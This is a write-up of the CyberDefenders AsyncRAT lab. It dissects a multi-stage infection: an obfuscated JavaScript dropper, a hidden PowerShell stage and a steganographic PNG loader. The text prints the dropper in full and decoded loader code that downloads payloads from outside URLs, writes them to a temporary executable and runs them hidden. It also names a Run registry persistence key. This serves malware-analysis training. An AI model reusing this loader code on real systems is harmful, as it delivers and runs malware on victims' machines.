CyberDefenders - AsyncRAT
This lab aims to equip learners with practical skills in malware analysis by dissecting a multi-stage AsyncRAT infection. Participants will explore obfuscation techniques, payload extraction, persistence mechanisms, and steganographic methods used in real-world malware, enhancing their ability to detect, analyze, and respond to complex cyber threats.
Intro Text
You are a cybersecurity analyst at Globex Corp. A concerning report has come in: an employee opened an email with an attachment claiming to be an order specification, which actually harbored a JavaScript file designed to deploy AsyncRAT. This malware evades detection with alarming efficiency. To secure Globex's network and data, you must analyze the attachment, reverse-engineer the AsyncRAT’s obfuscation techniques, and determine the scope of AsyncRAT's infiltration.
Link to lab: https://cyberdefenders.org/blueteam-ctf-challenges/asyncrat/
Questions
In the process of dissecting the AsyncRAT payload, you discover a variable in the PowerShell script shrouded in complexity. What is the name of this variable that conceals the malicious obfuscated code?
The code we are given is clearly obfuscated, so we need to run it through some de-obfuscation tools.
Original code:
var _0x2ed357 = _0x55e1; (function (_0x4fbbdd, _0x38b324) { var _0x1efc0 = _0x55e1; var _0x3c7ba1 = _0x4fbbdd(); while (!![]) { try { var _0x170c96 = parseInt(_0x1efc0(0x12f)) / 0x1 + parseInt(_0x1efc0(0x12a)) / 0x2 + -parseInt(_0x1efc0(0x11e)) / 0x3 * (-parseInt(_0x1efc0(0x11b)) / 0x4) + -parseInt(_0x1efc0(0x123)) / 0x5 * (-parseInt(_0x1efc0(0x131)) / 0x6) + parseInt(_0x1efc0(0x134)) / 0x7 + -parseInt(_0x1efc0(0x11c)) / 0x8 * (-parseInt(_0x1efc0(0x132)) / 0x9) + -parseInt(_0x1efc0(0x11d)) / 0xa * (parseInt(_0x1efc0(0x130)) / 0xb); if (_0x170c96 === _0x38b324) { break; } else { _0x3c7ba1['push'](_0x3c7ba1['shift']()); } } catch (_0x2f32f5) { _0x3c7ba1['push'](_0x3c7ba1['shift']()); } } }(_0x2053, 0xa1738)); var gQBnV = ![]; function PPGnIJfdSdJwnbhDmJOmPsHixFAUqYszDllXfNfgjBvoLlUjSGGClBwLWEMMGNpFQYhoJOugHPuOyfuGziEuOWLmcMWmyWNfYqfdoCgGMvwCJltPxiflBrKgywudmPLWXTYXcoJboaQdSKXTzmBswwBNcVdmARyaXbfmbDtfxzfTCFeQWgAnOQtnHPWVxrQnvVspDhKI(_0x5d58a2) { var _0x58d92c = _0x55e1; return _0x5d58a2[_0x58d92c(0x133)]('')[_0x58d92c(0x135)]()[_0x58d92c(0x129)](''); } var olffySApjnmNzEVCrHdsmIvkvtrmdvjBfknvClSyBGJHuqChGtDdwNjUtRxkkyfJOYUiJGZMAThKDTsUxGJuaNqSbTPvTbbqmefDGsXrinQyOMnXQfeSjWxgZKFIubTWXJNqCxTJwTRbGDBclyLnPEmbnFRmJCPDQxEhyrMtITkhfcVQBxcMaJXujuQBrVucxLrEASLY = PPGnIJfdSdJwnbhDmJOmPsHixFAUqYszDllXfNfgjBvoLlUjSGGClBwLWEMMGNpFQYhoJOugHPuOyfuGziEuOWLmcMWmyWNfYqfdoCgGMvwCJltPxiflBrKgywudmPLWXTYXcoJboaQdSKXTzmBswwBNcVdmARyaXbfmbDtfxzfTCFeQWgAnOQtnHPWVxrQnvVspDhKI(_0x2ed357(0x12c)); var hanqbbYcWLzDlNxOPncjvQCBQonxVECthpIBwsmoBBvosDsujcOzxzaSUiwwkpZHunsTFbSwqYqacScohDNICrUwvjkGulSfZZmeTtftPaPdvKsQTJQISdssGpxQIUGuxwhWPmoCMGohuYLXDyTwcGOtBtKBHZMXyOJlkQOEhkiqLvzhicJrDPknYXzFTodoezdLgRHq = PPGnIJfdSdJwnbhDmJOmPsHixFAUqYszDllXfNfgjBvoLlUjSGGClBwLWEMMGNpFQYhoJOugHPuOyfuGziEuOWLmcMWmyWNfYqfdoCgGMvwCJltPxiflBrKgywudmPLWXTYXcoJboaQdSKXTzmBswwBNcVdmARyaXbfmbDtfxzfTCFeQWgAnOQtnHPWVxrQnvVspDhKI('\x27\x20=\x20ogidoC$') + olffySApjnmNzEVCrHdsmIvkvtrmdvjBfknvClSyBGJHuqChGtDdwNjUtRxkkyfJOYUiJGZMAThKDTsUxGJuaNqSbTPvTbbqmefDGsXrinQyOMnXQfeSjWxgZKFIubTWXJNqCxTJwTRbGDBclyLnPEmbnFRmJCPDQxEhyrMtITkhfcVQBxcMaJXujuQBrVucxLrEASLY + '\x27;' + PPGnIJfdSdJwnbhDmJOmPsHixFAUqYszDllXfNfgjBvoLlUjSGGClBwLWEMMGNpFQYhoJOugHPuOyfuGziEuOWLmcMWmyWNfYqfdoCgGMvwCJltPxiflBrKgywudmPLWXTYXcoJboaQdSKXTzmBswwBNcVdmARyaXbfmbDtfxzfTCFeQWgAnOQtnHPWVxrQnvVspDhKI(_0x2ed357(0x124)) + 
PPGnIJfdSdJwnbhDmJOmPsHixFAUqYszDllXfNfgjBvoLlUjSGGClBwLWEMMGNpFQYhoJOugHPuOyfuGziEuOWLmcMWmyWNfYqfdoCgGMvwCJltPxiflBrKgywudmPLWXTYXcoJboaQdSKXTzmBswwBNcVdmARyaXbfmbDtfxzfTCFeQWgAnOQtnHPWVxrQnvVspDhKI(_0x2ed357(0x127)) + PPGnIJfdSdJwnbhDmJOmPsHixFAUqYszDllXfNfgjBvoLlUjSGGClBwLWEMMGNpFQYhoJOugHPuOyfuGziEuOWLmcMWmyWNfYqfdoCgGMvwCJltPxiflBrKgywudmPLWXTYXcoJboaQdSKXTzmBswwBNcVdmARyaXbfmbDtfxzfTCFeQWgAnOQtnHPWVxrQnvVspDhKI(_0x2ed357(0x12e)) + PPGnIJfdSdJwnbhDmJOmPsHixFAUqYszDllXfNfgjBvoLlUjSGGClBwLWEMMGNpFQYhoJOugHPuOyfuGziEuOWLmcMWmyWNfYqfdoCgGMvwCJltPxiflBrKgywudmPLWXTYXcoJboaQdSKXTzmBswwBNcVdmARyaXbfmbDtfxzfTCFeQWgAnOQtnHPWVxrQnvVspDhKI(_0x2ed357(0x12b)) + PPGnIJfdSdJwnbhDmJOmPsHixFAUqYszDllXfNfgjBvoLlUjSGGClBwLWEMMGNpFQYhoJOugHPuOyfuGziEuOWLmcMWmyWNfYqfdoCgGMvwCJltPxiflBrKgywudmPLWXTYXcoJboaQdSKXTzmBswwBNcVdmARyaXbfmbDtfxzfTCFeQWgAnOQtnHPWVxrQnvVspDhKI(_0x2ed357(0x12d)) + PPGnIJfdSdJwnbhDmJOmPsHixFAUqYszDllXfNfgjBvoLlUjSGGClBwLWEMMGNpFQYhoJOugHPuOyfuGziEuOWLmcMWmyWNfYqfdoCgGMvwCJltPxiflBrKgywudmPLWXTYXcoJboaQdSKXTzmBswwBNcVdmARyaXbfmbDtfxzfTCFeQWgAnOQtnHPWVxrQnvVspDhKI('6esaBmorF::]trevno') + PPGnIJfdSdJwnbhDmJOmPsHixFAUqYszDllXfNfgjBvoLlUjSGGClBwLWEMMGNpFQYhoJOugHPuOyfuGziEuOWLmcMWmyWNfYqfdoCgGMvwCJltPxiflBrKgywudmPLWXTYXcoJboaQdSKXTzmBswwBNcVdmARyaXbfmbDtfxzfTCFeQWgAnOQtnHPWVxrQnvVspDhKI(_0x2ed357(0x126)) + PPGnIJfdSdJwnbhDmJOmPsHixFAUqYszDllXfNfgjBvoLlUjSGGClBwLWEMMGNpFQYhoJOugHPuOyfuGziEuOWLmcMWmyWNfYqfdoCgGMvwCJltPxiflBrKgywudmPLWXTYXcoJboaQdSKXTzmBswwBNcVdmARyaXbfmbDtfxzfTCFeQWgAnOQtnHPWVxrQnvVspDhKI(_0x2ed357(0x125)) + PPGnIJfdSdJwnbhDmJOmPsHixFAUqYszDllXfNfgjBvoLlUjSGGClBwLWEMMGNpFQYhoJOugHPuOyfuGziEuOWLmcMWmyWNfYqfdoCgGMvwCJltPxiflBrKgywudmPLWXTYXcoJboaQdSKXTzmBswwBNcVdmARyaXbfmbDtfxzfTCFeQWgAnOQtnHPWVxrQnvVspDhKI(_0x2ed357(0x121)) + PPGnIJfdSdJwnbhDmJOmPsHixFAUqYszDllXfNfgjBvoLlUjSGGClBwLWEMMGNpFQYhoJOugHPuOyfuGziEuOWLmcMWmyWNfYqfdoCgGMvwCJltPxiflBrKgywudmPLWXTYXcoJboaQdSKXTzmBswwBNcVdmARyaXbfmbDtfxzfTCFeQWgAnOQtnHPWVxrQnvVspDhKI(_0x2ed357(0x11f)) + 
PPGnIJfdSdJwnbhDmJOmPsHixFAUqYszDllXfNfgjBvoLlUjSGGClBwLWEMMGNpFQYhoJOugHPuOyfuGziEuOWLmcMWmyWNfYqfdoCgGMvwCJltPxiflBrKgywudmPLWXTYXcoJboaQdSKXTzmBswwBNcVdmARyaXbfmbDtfxzfTCFeQWgAnOQtnHPWVxrQnvVspDhKI(_0x2ed357(0x128)) + PPGnIJfdSdJwnbhDmJOmPsHixFAUqYszDllXfNfgjBvoLlUjSGGClBwLWEMMGNpFQYhoJOugHPuOyfuGziEuOWLmcMWmyWNfYqfdoCgGMvwCJltPxiflBrKgywudmPLWXTYXcoJboaQdSKXTzmBswwBNcVdmARyaXbfmbDtfxzfTCFeQWgAnOQtnHPWVxrQnvVspDhKI('moc-\x20eliforPo') + PPGnIJfdSdJwnbhDmJOmPsHixFAUqYszDllXfNfgjBvoLlUjSGGClBwLWEMMGNpFQYhoJOugHPuOyfuGziEuOWLmcMWmyWNfYqfdoCgGMvwCJltPxiflBrKgywudmPLWXTYXcoJboaQdSKXTzmBswwBNcVdmARyaXbfmbDtfxzfTCFeQWgAnOQtnHPWVxrQnvVspDhKI('dxujWO$\x20dnam'); var eDiSkbNqurqMJDuUiMjNdhOPQQQBvgCftSEHiubYOGUaguzUTNMYeXrTtQOfKyfoAYstCerExYstbTlKouLwhYrnRQphSSARgdjkjrVfvyUZpnHZUSKwsqxMwNFXqElpakdDRQTBboYYHlOHdpQuaUtcDulXphSoyytwUdssTCfGwUoaWBxOUbiVhnwlqCxQURynpcjj = _0x2ed357(0x122); var ESlFnRWpugflXfvZqSyJlkwsMpcbzCAvFjVaLHGmHCPVjVevdKGGqImgXdntYCyHpCJZWNwKzrUiJEdtUbSUwZDEcrUscveYRSCVwMyIGRzKcZGjcknRtkmrhtoHYyjrUqVpSuBjUVbcmXfLCWiAdbpEMwWATsqxmdxuDKODAfEFiwTDSExHzcsrUPrmOKWPyRGNlldF = new ActiveXObject(eDiSkbNqurqMJDuUiMjNdhOPQQQBvgCftSEHiubYOGUaguzUTNMYeXrTtQOfKyfoAYstCerExYstbTlKouLwhYrnRQphSSARgdjkjrVfvyUZpnHZUSKwsqxMwNFXqElpakdDRQTBboYYHlOHdpQuaUtcDulXphSoyytwUdssTCfGwUoaWBxOUbiVhnwlqCxQURynpcjj); ESlFnRWpugflXfvZqSyJlkwsMpcbzCAvFjVaLHGmHCPVjVevdKGGqImgXdntYCyHpCJZWNwKzrUiJEdtUbSUwZDEcrUscveYRSCVwMyIGRzKcZGjcknRtkmrhtoHYyjrUqVpSuBjUVbcmXfLCWiAdbpEMwWATsqxmdxuDKODAfEFiwTDSExHzcsrUPrmOKWPyRGNlldF[_0x2ed357(0x120)](_0x2ed357(0x11a) + hanqbbYcWLzDlNxOPncjvQCBQonxVECthpIBwsmoBBvosDsujcOzxzaSUiwwkpZHunsTFbSwqYqacScohDNICrUwvjkGulSfZZmeTtftPaPdvKsQTJQISdssGpxQIUGuxwhWPmoCMGohuYLXDyTwcGOtBtKBHZMXyOJlkQOEhkiqLvzhicJrDPknYXzFTodoezdLgRHq + '\x22', 0x0, ![]); function _0x55e1(_0x2fba78, _0x26ef0b) { var _0x205308 = _0x2053(); _0x55e1 = function (_0x55e126, _0x45c24a) { _0x55e126 = _0x55e126 - 0x11a; var _0x157235 = _0x205308[_0x55e126]; return _0x157235; }; return 
_0x55e1(_0x2fba78, _0x26ef0b); } function _0x2053() { var _0x2ba7ce = [ 'S[\x20=\x20dxujWO$', ';))\x20)\x27b\x27,\x27♚♛\x27(eca', 'lper.ogidoc$(gnirtS4', 'eT.metsy', 'N-\x20ssapyb\x20ycilopnoituc', 'join', '1025078vdqKYY', 'eG.edoci', '==Aa0FGUlhXRw1WZ0RCIk5WYt12♚♛j1CIlxWam9mcQ9mTtAyczFGc5JGI5NWas9Gcu9Wa0V3YlhXZtAi♚♛lRGZphGIlxWe0N3dvRm♚♛pdXLgUGel5C♚♛sVGazJXZ39Gc7kyclRXeCRm♚♛h1W♚♛vNGJgwCa0FGUlhXRw1WZ0RCKzVGd5JE♚♛sFUZ0lmcXpjOdVG♚♛pZkLPlkLtVGdzl3U♚♛tjIlhXZuICIrASKocm♚♛pJHdT9GVukCKklWdHdXZOpjOdRWa1dkLtVGdzl3U♚♛ByKgkCKoRXYQBX♚♛lRFdldkO60Fa0FGUu8USu0WZ0NXeTtFI9ACa0FGUlhXRw1WZ0RyOpQm♚♛h1W♚♛vNEN2U2chJGJocm♚♛pJHdTRjNlNXYC12♚♛yZkO60FdyVmdu92Qu0WZ0NXeTtFI9AyclRXeCRm♚♛h1W♚♛vNGJ7Qm♚♛h1W♚♛vNEN2U2chJGJg4WavpWL9Qm♚♛h1W♚♛vNEN2U2chJGJ7kCZuFW♚♛t92Q0YTZzFmYkgSZzJXZ2VmU6oTX5FmcyF2W7kCK5FmcyFkchh2QvRlLpgGdn5WZMRjNlNXYiRCIsgXZk5WS0JXY0NHJocm♚♛pJHdzJWdT5Cd4VGVldWYtlGJg0DIk5WYt12♚♛DRjNlNXYiRyO4VGZulEdyFGdzRCItACelRm♚♛JRm♚♛lRCI9ACa0dm♚♛lxEN2U2chJGJ7gGdn5WZM5yZhxmR0JXY0NHJg0zKggXZk5WS0JXY0NHJ7gXZk5WS0JXY0NHJgQ3ZtACelRm♚♛JRm♚♛lRCIk5WYtACMgU2ZtACelRm♚♛JRnchR3cksTKnFG♚♛GRm♚♛lRCKm9EelRm♚♛J5Cd4VGVldWYtlGJg0DI4VGZulEZuVGJ7kyZhxmR0JXY0NHJoY2T4VGZulkL0hXZUV2Zh1WakASPggXZk5WS0JXY0NHJ7ciP+QkTF9FN2U0UBJEP8cCI9AyZhxmRk5WZkszJ+4DVSFEVT9FN2U0UBJEP8cCI9AyZhxmR0JXY0NHJ7kyclRXeCV2Zh1WakgyZulmc0NFdldkL4YEVVpjOddm♚♛pR2♚♛j5WRuQHelRlLtVGdzl3U♚♛BSPgQHelRVZnFW♚♛pRyOpwmcVV2Zh1WakgSY0FGRkF2♚♛s52dvRkL05WZpx2QiV2dkASPgMXZ0lnQldWYtlGJ7Qn♚♛llG♚♛DJWZX5Cdl5kLtVGdzl3UgQ3YlpmYP1ydl5EI9ACduVWasNkYldHJ7cyZuBnLrZzSzQlerhHczllcvMXZnFW♚♛p9y♚♛j5CZyJGcuIm♚♛kN2Zv8iOzBHd0h2Jg0DIsJXVldWYtlGJ', 'C.metsyS[(gnirtSt', 'nU::]gnidocnE.tx', '1300151dRQMiR', '11SZefHC', '6irkekm', '488718KfgGNI', 'split', '3218285wvujoz', 'reverse', 'powershell\x20-command\x20\x22', '4AOQQVR', '136SVlYwa', '32526170qzGCNq', '374217EdqpjF', 'exe-\x20neddih\x20elytswod', 'Run', 'niw-\x20exe.llehsrewop', 'WScript.Shell', '2968015qdSJdF' ]; _0x2053 = function () { return _0x2ba7ce; }; return _0x2053(); }

Running it through a deobfuscator, we get:
function PPGnIJfdSdJwnbhDmJOmPsHixFAUqYszDllXfNfgjBvoLlUjSGGClBwLWEMMGNpFQYhoJOugHPuOyfuGziEuOWLmcMWmyWNfYqfdoCgGMvwCJltPxiflBrKgywudmPLWXTYXcoJboaQdSKXTzmBswwBNcVdmARyaXbfmbDtfxzfTCFeQWgAnOQtnHPWVxrQnvVspDhKI(_0x5d58a2) { return _0x5d58a2.split('').reverse().join(''); } var olffySApjnmNzEVCrHdsmIvkvtrmdvjBfknvClSyBGJHuqChGtDdwNjUtRxkkyfJOYUiJGZMAThKDTsUxGJuaNqSbTPvTbbqmefDGsXrinQyOMnXQfeSjWxgZKFIubTWXJNqCxTJwTRbGDBclyLnPEmbnFRmJCPDQxEhyrMtITkhfcVQBxcMaJXujuQBrVucxLrEASLY = "==Aa0FGUlhXRw1WZ0RCIk5WYt12♚♛j1CIlxWam9mcQ9mTtAyczFGc5JGI5NWas9Gcu9Wa0V3YlhXZtAi♚♛lRGZphGIlxWe0N3dvRm♚♛pdXLgUGel5C♚♛sVGazJXZ39Gc7kyclRXeCRm♚♛h1W♚♛vNGJgwCa0FGUlhXRw1WZ0RCKzVGd5JE♚♛sFUZ0lmcXpjOdVG♚♛pZkLPlkLtVGdzl3U♚♛tjIlhXZuICIrASKocm♚♛pJHdT9GVukCKklWdHdXZOpjOdRWa1dkLtVGdzl3U♚♛ByKgkCKoRXYQBX♚♛lRFdldkO60Fa0FGUu8USu0WZ0NXeTtFI9ACa0FGUlhXRw1WZ0RyOpQm♚♛h1W♚♛vNEN2U2chJGJocm♚♛pJHdTRjNlNXYC12♚♛yZkO60FdyVmdu92Qu0WZ0NXeTtFI9AyclRXeCRm♚♛h1W♚♛vNGJ7Qm♚♛h1W♚♛vNEN2U2chJGJg4WavpWL9Qm♚♛h1W♚♛vNEN2U2chJGJ7kCZuFW♚♛t92Q0YTZzFmYkgSZzJXZ2VmU6oTX5FmcyF2W7kCK5FmcyFkchh2QvRlLpgGdn5WZMRjNlNXYiRCIsgXZk5WS0JXY0NHJocm♚♛pJHdzJWdT5Cd4VGVldWYtlGJg0DIk5WYt12♚♛DRjNlNXYiRyO4VGZulEdyFGdzRCItACelRm♚♛JRm♚♛lRCI9ACa0dm♚♛lxEN2U2chJGJ7gGdn5WZM5yZhxmR0JXY0NHJg0zKggXZk5WS0JXY0NHJ7gXZk5WS0JXY0NHJgQ3ZtACelRm♚♛JRm♚♛lRCIk5WYtACMgU2ZtACelRm♚♛JRnchR3cksTKnFG♚♛GRm♚♛lRCKm9EelRm♚♛J5Cd4VGVldWYtlGJg0DI4VGZulEZuVGJ7kyZhxmR0JXY0NHJoY2T4VGZulkL0hXZUV2Zh1WakASPggXZk5WS0JXY0NHJ7ciP+QkTF9FN2U0UBJEP8cCI9AyZhxmRk5WZkszJ+4DVSFEVT9FN2U0UBJEP8cCI9AyZhxmR0JXY0NHJ7kyclRXeCV2Zh1WakgyZulmc0NFdldkL4YEVVpjOddm♚♛pR2♚♛j5WRuQHelRlLtVGdzl3U♚♛BSPgQHelRVZnFW♚♛pRyOpwmcVV2Zh1WakgSY0FGRkF2♚♛s52dvRkL05WZpx2QiV2dkASPgMXZ0lnQldWYtlGJ7Qn♚♛llG♚♛DJWZX5Cdl5kLtVGdzl3UgQ3YlpmYP1ydl5EI9ACduVWasNkYldHJ7cyZuBnLrZzSzQlerhHczllcvMXZnFW♚♛p9y♚♛j5CZyJGcuIm♚♛kN2Zv8iOzBHd0h2Jg0DIsJXVldWYtlGJ".split('').reverse().join(''); var 
hanqbbYcWLzDlNxOPncjvQCBQonxVECthpIBwsmoBBvosDsujcOzxzaSUiwwkpZHunsTFbSwqYqacScohDNICrUwvjkGulSfZZmeTtftPaPdvKsQTJQISdssGpxQIUGuxwhWPmoCMGohuYLXDyTwcGOtBtKBHZMXyOJlkQOEhkiqLvzhicJrDPknYXzFTodoezdLgRHq = "' = ogidoC$".split('').reverse().join('') + olffySApjnmNzEVCrHdsmIvkvtrmdvjBfknvClSyBGJHuqChGtDdwNjUtRxkkyfJOYUiJGZMAThKDTsUxGJuaNqSbTPvTbbqmefDGsXrinQyOMnXQfeSjWxgZKFIubTWXJNqCxTJwTRbGDBclyLnPEmbnFRmJCPDQxEhyrMtITkhfcVQBxcMaJXujuQBrVucxLrEASLY + "';" + "S[ = dxujWO$".split('').reverse().join('') + "eT.metsy".split('').reverse().join('') + "nU::]gnidocnE.tx".split('').reverse().join('') + "eG.edoci".split('').reverse().join('') + "C.metsyS[(gnirtSt".split('').reverse().join('') + '6esaBmorF::]trevno'.split('').reverse().join('') + "lper.ogidoc$(gnirtS4".split('').reverse().join('') + ";)) )'b','♚♛'(eca".split('').reverse().join('') + "niw- exe.llehsrewop".split('').reverse().join('') + "exe- neddih elytswod".split('').reverse().join('') + "N- ssapyb ycilopnoituc".split('').reverse().join('') + "moc- eliforPo".split('').reverse().join('') + "dxujWO$ dnam".split('').reverse().join(''); var ESlFnRWpugflXfvZqSyJlkwsMpcbzCAvFjVaLHGmHCPVjVevdKGGqImgXdntYCyHpCJZWNwKzrUiJEdtUbSUwZDEcrUscveYRSCVwMyIGRzKcZGjcknRtkmrhtoHYyjrUqVpSuBjUVbcmXfLCWiAdbpEMwWATsqxmdxuDKODAfEFiwTDSExHzcsrUPrmOKWPyRGNlldF = new ActiveXObject("WScript.Shell"); ESlFnRWpugflXfvZqSyJlkwsMpcbzCAvFjVaLHGmHCPVjVevdKGGqImgXdntYCyHpCJZWNwKzrUiJEdtUbSUwZDEcrUscveYRSCVwMyIGRzKcZGjcknRtkmrhtoHYyjrUqVpSuBjUVbcmXfLCWiAdbpEMwWATsqxmdxuDKODAfEFiwTDSExHzcsrUPrmOKWPyRGNlldF.Run("powershell -command \"" + hanqbbYcWLzDlNxOPncjvQCBQonxVECthpIBwsmoBBvosDsujcOzxzaSUiwwkpZHunsTFbSwqYqacScohDNICrUwvjkGulSfZZmeTtftPaPdvKsQTJQISdssGpxQIUGuxwhWPmoCMGohuYLXDyTwcGOtBtKBHZMXyOJlkQOEhkiqLvzhicJrDPknYXzFTodoezdLgRHq + "\"", 0x0, false);

Looking at the code from a high level, we can see that the last variable is the one that tries to run code, so we can interpret the other variables in our browser and get the deobfuscated, ready-to-run code:

$Codigo = 'JGltYWdlVXJsID0gJ2h0dHBzOi8vZ2Nk♛♚mIucGJyZC5j♛♚y9p♛♚WFnZXMvcllzcHhrelQzSzZrLnBuZyc7JHdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJD♛♚Gll♛♚nQ7JGltYWdlQnl0ZXMgPSAkd2ViQ2xpZW50LkRvd25s♛♚2FkRGF0YSgkaW1hZ2VVcmwpOyRp♛♚WFnZVRleHQgPSB♛♚U3lzdGVtLlRleHQuRW5j♛♚2Rp♛♚mddOjpVVEY4LkdldFN0cmluZygkaW1hZ2VCeXRlcyk7JHN0YXJ0RmxhZyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskZW5kRmxhZyA9ICc8PEJBU0U2NF9FTkQ+Pic7JHN0YXJ0SW5kZXggPSAkaW1hZ2VUZXh0LkluZGV4T2YoJHN0YXJ0RmxhZyk7JGVuZEluZGV4ID0gJGltYWdlVGV4dC5J♛♚mRleE9mKCRl♛♚mRG♛♚GFnKTskc3RhcnRJ♛♚mRleCAtZ2UgMCAtYW5kICRl♛♚mRJ♛♚mRleCAtZ3QgJHN0YXJ0SW5kZXg7JHN0YXJ0SW5kZXggKz0gJHN0YXJ0RmxhZy5MZW5ndGg7JGJhc2U2NExl♛♚md0aCA9ICRl♛♚mRJ♛♚mRleCAtICRzdGFydEluZGV4OyRiYXNlNjRD♛♚21tYW5kID0gJGltYWdlVGV4dC5TdWJzdHJp♛♚mcoJHN0YXJ0SW5kZXgsICRiYXNlNjRMZW5ndGgpLlRvQ2hhckFycmF5KCk7W2FycmF5XTo6UmV2ZXJzZSgkYmFzZTY0Q29t♛♚WFuZCk7JGJhc2U2NENv♛♚W1h♛♚mQ9LWpvaW4gJGJhc2U2NENv♛♚W1h♛♚mQ7JGNv♛♚W1h♛♚mRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZy♛♚21CYXNlNjRTdHJp♛♚mcoJGJhc2U2NENv♛♚W1h♛♚mQpOyR0ZW1wRXhlUGF0aCA9IFtTeXN0ZW0uSU8uUGF0aF06OkdldFRl♛♚XBQYXRoKCkgKyB♛♚U3lzdGVtLkd1aWRdOjpOZXdHdWlkKCkuVG9TdHJp♛♚mcoKSArICIuZXhlIjt♛♚U3lzdGVtLklPLkZp♛♚GVdOjpXcml0ZUFs♛♚EJ5dGVzKCR0ZW1wRXhlUGF0aCwgJGNv♛♚W1h♛♚mRCeXRlcyk7cG93ZXJzaGVs♛♚C5leGUgLXdp♛♚mRvd3N0eWxlIGhpZGRl♛♚iAtZXhlY3V0aW9ucG9saWN5IGJ5cGFzcyAtTm9Qcm9maWxlIC1j♛♚21tYW5kICR0ZW1wRXhlUGF0aA==';
$OWjuxd = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($codigo.replace('♛♚','b') ));
powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxd

From this code, we can figure out that $Codigo is the variable obfuscating the code.
As you trace the AsyncRAT’s steps, you come across a pivotal moment where it reaches out to the internet, fetching the next phase of its invasion. Identify the URL used to download the second stage of this malicious campaign.
Looking at the code from the last question, we can see that PowerShell executes the large string after replacing the special characters with 'b' and decoding it from base64. This is a common trick attackers use to get past AV signatures and to avoid encoding errors. Loading it into CyberChef, we can get it decoded and easy to analyze.
$imageUrl = 'https://gcdnb.pbrd.co/images/rYspxkzT3K6k.png';
$webClient = New-Object System.Net.WebClient;
$imageBytes = $webClient.DownloadData($imageUrl);
$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);
$startFlag = '<<BASE64_START>>';
$endFlag = '<<BASE64_END>>';
$startIndex = $imageText.IndexOf($startFlag);
$endIndex = $imageText.IndexOf($endFlag);
$startIndex -ge 0 -and $endIndex -gt $startIndex;
$startIndex += $startFlag.Length;
$base64Length = $endIndex - $startIndex;
$base64Command = $imageText.Substring($startIndex, $base64Length).ToCharArray();
[array]::Reverse($base64Command);
$base64Command=-join $base64Command;
$commandBytes = [System.Convert]::FromBase64String($base64Command);
$tempExePath = [System.IO.Path]::GetTempPath() + [System.Guid]::NewGuid().ToString() + ".exe";
[System.IO.File]::WriteAllBytes($tempExePath, $commandBytes);
powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $tempExePath

The URL is right there at the top of the code: https://gcdnb.pbrd.co/images/rYspxkzT3K6k.png
Within the chaos of encoded data retrieved during your investigation, there's a string that signals the beginning of the encoded code. What is this marker indicating where the encoded treasure lies within the downloaded file?
Looking at the code from the last question, we can see that <<BASE64_START>> is the marker.
The second stage of AsyncRAT has been meticulously unpacked, revealing an extracted Portable Executable (PE). To understand this stage's uniqueness, what is the MD5 hash of this extracted PE?
Because the original link is dead, I used the file stored in the VM.
$imageBytes = [System.IO.File]::ReadAllBytes("C:\Users\Administrator\Desktop\Start Here\Artifacts\rYspxkzT3K6k.png");
$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);
$startFlag = '<<BASE64_START>>';
$endFlag = '<<BASE64_END>>';
$startIndex = $imageText.IndexOf($startFlag);
$endIndex = $imageText.IndexOf($endFlag);
$startIndex -ge 0 -and $endIndex -gt $startIndex;
$startIndex += $startFlag.Length;
$base64Length = $endIndex - $startIndex;
$base64Command = $imageText.Substring($startIndex, $base64Length).ToCharArray();
[array]::Reverse($base64Command);
$base64Command=-join $base64Command;
$commandBytes = [System.Convert]::FromBase64String($base64Command);
$tempExePath = [System.IO.Path]::GetTempPath() + [System.Guid]::NewGuid().ToString() + ".exe";
[System.IO.File]::WriteAllBytes($tempExePath, $commandBytes);
# the final line stays commented out so the extracted file is written but never run
#powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $tempExePath

Afterwards, we can use $tempExePath to find the location of the executable file, and then we can use Get-FileHash in PowerShell to get the MD5 hash of the file.

PS C:\Users\Administrator\Desktop\Start here\Artifacts> Get-FileHash $tempExePath -Algorithm MD5

Algorithm       Hash                                      Path
---------       ----                                      ----
MD5             C1AA076CA869A7520CA2E003B7C02AB3          C:\Users\Administrator\AppDat...
AsyncRAT seeks to embed itself within the system for long-term espionage. During your sweep, you stumble upon a registry key intended for persistence. Can you provide the full path of this registry key where the malware attempts to solidify its presence?
Let's hook this up to dnSpy and look into the decompilation of the malware to figure out what registry key it is modifying.
Looking at this source code, we can see that they seem to reverse most of the strings, possibly as an effort to evade Windows Defender or other AVs. Thankfully the code itself is not obfuscated, and we can find the registry key in the RegistryKey variable 😛; all we have to do now is reverse it. Plugging it into CyberChef, we get SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run. This doesn't work for the answer though: we need to look closely at the code and see that it's using Registry.CurrentUser.OpenSubKey, so we need to add HKCU before the other keys.
Your analysis doesn't stop at the second stage; the malware has more secrets to unveil. A third stage is downloaded from a URL you need to uncover. What is the URL from which the malware downloads the third stage?
Just below this, and in the screenshot above, we can see a reversed URL, so after reversing it we find https://web.archive.org/web/20240701132151if_/https://gcdnb.pbrd.co/images/L3GM1EngRrYs.png
With the third stage of AsyncRAT now in focus, another Portable Executable (PE) comes to light. For a comprehensive understanding of this stage, what is the MD5 hash of the extracted PE from the third stage?
Because the CyberDefenders VM has no access to the web, I need to use a VM for this step.
I'm just gonna write a new "script" (not really a script ig, I'm just pasting this into a terminal) based on the old one.
$imageUrl = 'https://web.archive.org/web/20240701132151if_/https://gcdnb.pbrd.co/images/L3GM1EngRrYs.png';
$webClient = New-Object System.Net.WebClient;
$imageBytes = $webClient.DownloadData($imageUrl);
$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);
$startFlag = '<<BASE64_START>>';
$endFlag = '<<BASE64_END>>';
$startIndex = $imageText.IndexOf($startFlag);
$endIndex = $imageText.IndexOf($endFlag);
$startIndex -ge 0 -and $endIndex -gt $startIndex;
$startIndex += $startFlag.Length;
$base64Length = $endIndex - $startIndex;
$base64Command = $imageText.Substring($startIndex, $base64Length).ToCharArray();
[array]::Reverse($base64Command);
$base64Command=-join $base64Command;
$commandBytes = [System.Convert]::FromBase64String($base64Command);
$tempExePath = [System.IO.Path]::GetTempPath() + [System.Guid]::NewGuid().ToString() + ".exe";
